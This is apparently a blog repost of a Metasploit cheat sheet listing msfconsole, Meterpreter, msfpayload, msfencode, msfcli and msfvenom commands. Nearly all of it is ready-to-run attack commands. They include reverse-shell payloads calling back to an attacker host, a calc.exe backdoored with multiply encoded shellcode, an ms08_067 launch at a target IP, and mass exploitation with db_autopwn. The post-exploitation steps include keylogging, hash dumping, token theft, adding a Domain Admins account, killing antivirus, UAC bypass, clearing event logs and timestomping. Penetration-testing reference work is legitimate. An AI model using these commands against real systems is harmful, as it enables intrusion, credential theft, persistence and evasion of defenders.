MSFconsole Commands
show exploits
Show all exploits within the Framework.
show payloads
Show all payloads within the Framework.
show auxiliary
Show all auxiliary modules within the Framework.
search name
Search for exploits or modules within the Framework.
info
Load information about a specific exploit or module.
use name
Load an exploit or module (example: use windows/smb/psexec).
LHOST
Your local host’s IP address reachable by the target, often the public IP
address when not on a local network. Typically used for reverse shells.
RHOST
The remote host or the target.
set function
Set a specific value (for example, LHOSTor RHOST).
setg function
Set a specific value globally (for example, LHOSTor RHOST).
show options
Show the options available for a module or exploit.
show targets
Show the platforms supported by the exploit.
set target num
Specify a specific target index if you know the OS and service pack.
set payload payload
Specify the payload to use.
show advanced
Show advanced options.
set autorunscript migrate -f
Automatically migrate to a separate process upon exploit completion.
check
Determine whether a target isvulnerable to an attack.
exploit
Execute the module or exploit and attack the target.
exploit -j
Run the exploit under the context of the job. (This will run the exploit
in the background.)
exploit -z
Do not interact with the session after successful exploitation.
exploit -e encoder
Specify the payload encoder to use (example: exploit –e shikata_ga_nai).
exploit -h
Display help for the exploitcommand.
sessions -l
List available sessions (used when handling multiple shells).
sessions -l -v
List all available sessions and show verbose fields, such as which vulnera-bility was used when exploiting the system.
sessions -s script
Run a specific Meterpreter scripton all Meterpreter live sessions.
sessions -K
Kill all live sessions.
sessions -c cmd
Execute a command on all live Meterpreter sessions.
sessions -u sessionID
Upgrade a normal Win32 shell to a Meterpreter console.
db_create name
Create a database to use with database-driven attacks (example: db_create
autopwn).
db_connect name
Create and connect to a database for driven attacks (example: db_connect
autopwn).
db_nmap
Use nmapand place results in database. (Normal nmapsyntax is supported,
such as –sT –v –P0.)
db_autopwn -h
Display help for using db_autopwn.
db_autopwn -p -r -e
Run db_autopwnagainst all ports found, use a reverse shell, and exploit all
systems.
db_destroy
Delete the current database.
db_destroy user:password@host:port/database
Delete database using advanced options.
Meterpreter Commands
help
Open Meterpreter usage help.
run scriptname
Run Meterpreter-based scripts;for a full list check the scripts/meterpreter
directory.
sysinfo
Show the system information on the compromised target.
ls
List the files and folders on the target.
use priv
Load the privilege extension for extended Meterpreter libraries.
ps
Show all running processes and which accounts are associated with each
process.
migrate PID
Migrate to the specific process ID (PID is the target process ID gained
from the pscommand).
use incognito
Load incognitofunctions. (Used for token stealing and impersonation on
a target machine.)
list_tokens -u
List available tokens on the target by user.
list_tokens -g
List available tokens on the target by group.
impersonate_token DOMAIN_NAME\\USERNAME
Impersonate a token available on the target.
steal_token PID
Steal the tokens available for a given process and impersonate that token.
drop_token
Stop impersonating the current token.
getsystem
Attempt to elevate permissions to SYSTEM-level access through multiple
attack vectors.
shell
Drop into an interactive shell with all available tokens.
execute -f cmd.exe -i
Execute cmd.exeand interact with it.
execute -f cmd.exe -i -t
Execute cmd.exewith all available tokens.
execute -f cmd.exe -i -H -t
Execute cmd.exewith all available tokens and make it a hidden process.
rev2self
Revert back to the original user you used to compromise the target.
reg command
Interact, create, delete, query, set, and much more in the target’s registry.
setdesktop number
Switch to a different screen based on who is logged in.
screenshot
Take a screenshot of the target’s screen.
upload file
Upload a file to the target.
download file
Download a file from the target.
keyscan_start
Start sniffing keystrokes on the remote target.
keyscan_dump
Dump the remote keys captured on the target.
keyscan_stop
Stop sniffing keystrokes on the remote target.
getprivs
Get as many privileges aspossible on the target.
uictl enable keyboard/mouse
Take control of the keyboard and/or mouse.
background
Run your current Meterpreter shell in the background.
hashdump
Dump all hashes on the target.
use sniffer
Load the sniffer module.
sniffer_interfaces
List the available interfaces on the target.
sniffer_dump interfaceID pcapname
Start sniffing on the remote target.
sniffer_start interfaceID packet-buffer
Start sniffing with a specificrange for a packet buffer.
sniffer_stats interfaceID
Grab statistical information from the interface you are sniffing.
sniffer_stop interfaceID
Stop the sniffer.
add_user username password-h ip
Add a user on the remote target.
add_group_user "Domain Admins" username-h ip
Add a username to the Domain Administratorsgroup on the remote target.
clearev
Clear the event log on the target machine.
timestomp
Change file attributes, such as creation date (antiforensics measure).
reboot
Reboot the target machine.
MSFpayload Commands
msfpayload -h
List available payloads.
msfpayload windows/meterpreter/bind_tcp O
List available options for the windows/meterpreter/bind_tcppayload (all of
these can use any payload).
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 X >
payload.exe
Create a Meterpreterreverse_tcppayload to connect back to 192.168.1.5
and on port 443, and then save it as a Windows Portable Executable
named payload.exe.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R >
payload.raw
Same as above, but export as raw format. This will be used later in
msfencode.
msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c
Same as above but export as C-formatted shellcode.
msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java
Export as %u encodedJavaScript.
MSFencode Commands
msfencode -h
Display the msfencodehelp.
msfencode -l
List the available encoders.
msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs,
loop-vbs, asp, war, macho)
Format to display the encoded buffer.
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5
-t exe
Encode payload.rawwith shikata_ga_naifive times and export it to an
output file named encoded_payload.exe.
msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/
_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o
multi-encoded_payload.exe
Create a multi-encoded payload.
msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c
Create pure alphanumeric shellcode where ESI points to the shellcode;
output in C-style notation.
MSFcli Commands
msfcli | grep exploit
Show only exploits.
msfcli | grep exploit/windows
Show only Windows exploits.
msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp
LPORT=443 RHOST=172.16.32.142 E
Launch ms08_067_netapiexploit at 172.16.32.142 with a bind_tcppayload
being delivered to listen on port 443
MSF, Ninja, Fu
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R |
msfencode -x calc.exe -k -o payload.exe -e x86/shikata_ga_nai -c 7 -t exe
Create a reverse Meterpreter payload connecting back to 192.168.1.5
on port 443 using calc.exeas a template to backdoor. Keep execution
flow within the application for it to continue to work, and output the
shikata_ga_naiencoded payload to payload.exe.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R |
msfencode -x calc.exe -o payload.exe -e x86/shikata_ga_nai -c 7 -t exe
Create a reverse Meterpreter payload connecting back to 192.168.1.5 on
port 443 using calc.exeas a template to backdoor. Does not keep execu-tion flow within the application and will not prompt anything back to the
end user when it is executed. This isuseful when you have remote access
via a browser exploit and don’t want the calculator application popping
up to the end user. Also outputs the shikata_ga_naiencoded payload to
payload.exe.
msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -o payload.exe
-e x86/shikata_ga_nai -c 7 -t exe && msfcli multi/handler PAYLOAD=windows/
meterpreter/bind_tcp LPORT=443 E
Create a bind_tcpMeterpreter payload in raw format, encode it seven
times using shikata_ga_nai, output it in Windows portable executable for-mat with a name of payload.exe, and then have a multi-handler listening
for it to execute.
MSFvenom
Leverage msfvenom, an all-in-one suite, to create and encode your payload:
msfvenom --payload
windows/meterpreter/reverse_tcp --format exe --encoder x86/shikata_ga_nai
LHOST=172.16.1.32 LPORT=443 > msf.exe
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
root@bt://opt/framework3/msf3#
This one liner will create a payload and automatically generate it in an
executable format.
Meterpreter Post Exploitation Commands
Elevate your permissions on Windows-based systems using Meterpreter:
meterpreter > use priv
meterpreter > getsystem
Steal a domain administrator token from a given process ID, add a
domain account, and then add it to the Domain Adminsgroup:
meterpreter > ps
meterpreter > steal_token 1784
meterpreter > shell
C:\Windows\system32>net user metasploit p@55w0rd /ADD /DOMAIN
C:\Windows\system32>net group "Domain Admins" metasploit /ADD /DOMAIN
Dump password hashes from the SAM database:
meterpreter > use priv
meterpreter > getsystem
meterpreter > hashdump
NOTE On Win2k8 you may need to migrate to a process that is running as SYSTEM if
getsystemand hashdumpthrow exceptions.
Automigrate to a separate process:
meterpreter > run migrate
Kill antivirus processes running on the target via the killavMeterpreter
script:
meterpreter > run killav
Capture keystrokes on target machinesfrom within a particular process:
meterpreter > ps
meterpreter > migrate 1436
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop
Use Incognito to impersonate an administrator:
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > use priv
meterpreter > getsystem
meterpreter > list_tokens -u
meterpreter > impersonate_token IHAZSECURITY\\Administrator
See what protection mechanisms are in place on the compromised
target, display the help menu, disable Windows Firewall, and kill all counter-measures found:
meterpreter > run getcountermeasure
meterpreter > run getcountermeasure -h
meterpreter > run getcountermeasure -d -k
Identify whether the compromised system is a virtual machine:
meterpreter > run checkvm
Drop into a command shell for a current Meterpreter console session:
meterpreter > shell
Get a remote GUI (VNC) on the target machine:
meterpreter > run vnc
Background a currently running Meterpreter console:
meterpreter > background
Bypass Windows User Access Control:
meterpreter > run post/windows/escalate/bypassuac
Dump Hashes on an OS X system:
meterpreter > run post/osx/gather/hashdump
Dump Hashes on a Linux system:
meterpreter > run post/linux/gather/hashdump
沒有留言:
張貼留言